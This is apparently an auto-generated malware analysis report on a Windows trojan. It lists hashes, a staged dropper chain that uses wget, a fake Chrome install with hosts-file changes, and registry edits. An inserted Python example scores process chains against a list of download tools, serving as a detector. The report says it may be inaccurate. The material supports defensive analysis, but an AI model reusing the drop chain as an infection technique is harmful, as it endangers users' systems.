Trojan.GenericKD.2148275_5a17120a4b

by malwarelabrobot on February 14th, 2015 in Malware Descriptions.

Trojan.Win32.VB.ctxv (Kaspersky), Trojan.GenericKD.2148275 (B) (Emsisoft), Trojan.GenericKD.2148275 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 5a17120a4b4e6bb53a0b07266b199fff
SHA1: 1cc638b1a13225ade482470f6aa897514b7830f9
SHA256: c3843701888ec6a9a46db8f60f2b6179bbd065cf43a3b08ea6273d00718455fe
SSDeep: 24576: aUxvxK4bpyPHlKka9h5fRrUpSg/IpC80EX04t1iN:qJKWUHlKk8h5fRrUMgwL0spuN
Size: 1051350 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-08-27 19:40:54
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

installer.exe:580
Chromium.exe:1116
wget.exe:612
arsiv.exe:792
%original file name%.exe:1676

The Trojan injects its code into the following process(es):
No code injection into other processes was observed.
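
The process list above reads as a staged dropper: the RarSFX archive extracts installer.exe, which drops Chromium.exe, which drops wget.exe, which writes (downloads) arsiv.exe. The following Python is an added example, not part of the Lavasoft report: it reconstructs that chain from process-creation events and flags the traits visible here (execution from a RarSFX temp directory, executables sitting directly in the Application Data root, a browser-named binary outside Program Files, a download tool launched from Application Data). The events are constructed; the parent/child links are an assumption from the drop order, since the report gives only image names and PIDs.

```python
"""Reconstruct and score the drop chain described above from process-creation
events. Added example, not part of the Lavasoft report; the parent/child links
are an assumption based on the drop order (each stage writes the next stage's
executable), since the report lists only image names and PIDs."""
import re
from typing import Dict, List

# Constructed events in the shape of Sysmon event 1 / EDR process-creation
# records: pid, parent pid, image path. PIDs and names follow the report; the
# user name and the sample's own file name are placeholders.
EVENTS = [
    {"pid": 1200, "ppid": 4,    "image": r"C:\WINDOWS\explorer.exe"},
    {"pid": 1676, "ppid": 1200, "image": r"C:\Documents and Settings\user\Desktop\sample.exe"},
    {"pid": 580,  "ppid": 1676, "image": r"C:\Documents and Settings\user\Local Settings\Temp\RarSFX0\installer.exe"},
    {"pid": 1116, "ppid": 580,  "image": r"C:\Documents and Settings\user\Application Data\Chromium.exe"},
    {"pid": 612,  "ppid": 1116, "image": r"C:\Documents and Settings\user\Application Data\wget.exe"},
    {"pid": 792,  "ppid": 612,  "image": r"C:\Documents and Settings\user\Application Data\arsiv.exe"},
]

SFX_TEMP_RE = re.compile(r"\\Temp\\RarSFX\d+\\[^\\]+\.exe$", re.IGNORECASE)
APPDATA_ROOT_RE = re.compile(r"\\Application Data\\[^\\]+\.exe$", re.IGNORECASE)
PROGRAM_FILES_RE = re.compile(r"^[A-Z]:\\Program Files", re.IGNORECASE)
DOWNLOADERS = {"wget.exe", "curl.exe", "bitsadmin.exe", "certutil.exe"}
BROWSER_NAMES = {"chrome.exe", "chromium.exe", "firefox.exe", "iexplore.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def build_index(events: List[dict]) -> Dict[int, dict]:
    return {e["pid"]: e for e in events}


def ancestry(index: Dict[int, dict], pid: int) -> List[str]:
    """Image basenames from the oldest known ancestor down to pid.
    Stops at an unknown parent and tolerates ppid cycles caused by PID reuse."""
    chain, seen = [], set()
    cur = index.get(pid)
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(basename(cur["image"]))
        cur = index.get(cur["ppid"])
    chain.reverse()
    return chain


def score_process(index: Dict[int, dict], pid: int) -> List[str]:
    """Reasons a single process matches the behaviour pattern in the report."""
    e = index[pid]
    image, name = e["image"], basename(e["image"])
    parent = index.get(e["ppid"])
    reasons = []
    if SFX_TEMP_RE.search(image):
        reasons.append("runs from a RarSFX temp extraction directory")
    if APPDATA_ROOT_RE.search(image):
        reasons.append("executable placed directly in the Application Data root")
    if name in BROWSER_NAMES and not PROGRAM_FILES_RE.match(image):
        reasons.append("browser-named binary outside Program Files")
    if name in DOWNLOADERS and parent is not None and APPDATA_ROOT_RE.search(parent["image"]):
        reasons.append("download tool started by an Application Data executable")
    if parent is not None and basename(parent["image"]) in DOWNLOADERS:
        reasons.append("started by a download tool (likely a just-fetched payload)")
    return reasons


def suspicious_processes(events: List[dict]) -> Dict[int, dict]:
    """pid -> {'chain': [...], 'reasons': [...]} for every flagged process."""
    index = build_index(events)
    out = {}
    for e in events:
        reasons = score_process(index, e["pid"])
        if reasons:
            out[e["pid"]] = {"chain": ancestry(index, e["pid"]), "reasons": reasons}
    return out


if __name__ == "__main__":
    for pid, info in suspicious_processes(EVENTS).items():
        print(pid, " -> ".join(info["chain"]))
        for r in info["reasons"]:
            print("   *", r)
```

On a live host the same functions can be fed real Sysmon or EDR records; the rules are deliberately narrow (path patterns and parent image names rather than hashes) so they survive the repacking that the UPolyX packer signature above suggests.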

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process installer.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Chromium.exe (11258 bytes)

The process Chromium.exe:1116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.pak (4185 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.pak (1281 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.pak (2105 bytes)
%System%\drivers\etc\hosts (269066 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\resources.pak (43124 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.pak (4545 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.pak (1425 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\libpeerconnection.dll (15116 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.pak (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jogoilaonpjembimhekgnboineibhdhf\bg.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (73 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.pak (2105 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\setting (28 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\icudt.dll (76505 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\chrome_100_percent.pak (7345 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.pak (1281 bytes)
%Documents and Settings%\%current user%\Desktop\Google Chrome.lnk (791 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.pak (1425 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\chrome.dll (360605 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.pak (2321 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.pak (1281 bytes)
%Documents and Settings%\%current user%\Application Data\bg.txt (3 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.pak (2105 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\pingjs.js (34 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.pak (2321 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.pak (4185 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\pepflashplayer.dll (113356 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.pak (2321 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.dll (10 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@joojlee[1].txt (214 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.dll (10 bytes)
%Program Files%\Google\Chrome\Application\chrome.exe (5889 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions (0 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (0 bytes)
%Documents and Settings%\%current user%\Application Data\bg.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\update.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\pingjs.js (0 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (0 bytes)

The process wget.exe:612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\arsiv.exe (3878606 bytes)

The process arsiv.exe:792 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\libpeerconnection.dll (56491 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\pepflashplayer.dll (277843 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.pak (4074 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\chrome.exe (30992 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\icudt.dll (455362 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.pak (5049 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.pak (1274 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome_100_percent.pak (6625 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.pak (2249 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome.dll (794832 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\resources.pak (40311 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.pak (4074 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.pak (3461 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.pak (3257 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.dll (10 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\__tmp_rar_sfx_access_check_849765 (0 bytes)

The process %original file name%.exe:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\installer.exe (38174 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\installer.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\__tmp_rar_sfx_access_check_831828 (0 bytes)

Registry activity

The process installer.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC BA B1 02 CE F8 15 52 E8 99 71 4F F8 3F 77 FE"

The process Chromium.exe:1116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

